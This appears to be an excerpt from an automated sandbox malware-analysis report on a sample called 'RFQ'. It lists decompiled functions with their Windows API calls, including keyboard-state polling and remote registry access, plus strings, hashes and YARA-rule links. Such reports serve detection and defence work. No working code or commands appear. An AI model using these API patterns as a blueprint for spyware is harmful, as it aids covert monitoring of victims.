                                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                          • String ID: X
                                                                          • API String ID: 3104067586-3081909835
                                                                          • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                          • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                          Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 440038798-2785691316
                                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                          Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                          • _wcslen.LIBCMT ref: 004610A3
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                          • String ID: ThumbnailClass
                                                                          • API String ID: 4136854206-1241985126
                                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                          Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                          • String ID: 2
                                                                          • API String ID: 1331449709-450215437
                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                          Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                          • API String ID: 3054410614-2561132961
                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                          Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 600699880-22481851
                                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                          Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: static
                                                                          • API String ID: 3375834691-2160076837
                                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                          Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                          • API String ID: 2907320926-3566645568
                                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                          Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                          • DeleteObject.GDI32(00630053), ref: 00470A04
                                                                          • DestroyIcon.USER32(00690072), ref: 00470A1C
                                                                          • DeleteObject.GDI32(00000001), ref: 00470A34
                                                                          • DestroyWindow.USER32(0055005C), ref: 00470A4C
                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 1237572874-0
                                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                          Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                          • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                          Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                          Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3413494760-0
                                                                          • Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                          • Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                          Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                          • String ID: AU3_FreeVar
                                                                          • API String ID: 2634073740-771828931
                                                                          • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                          • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
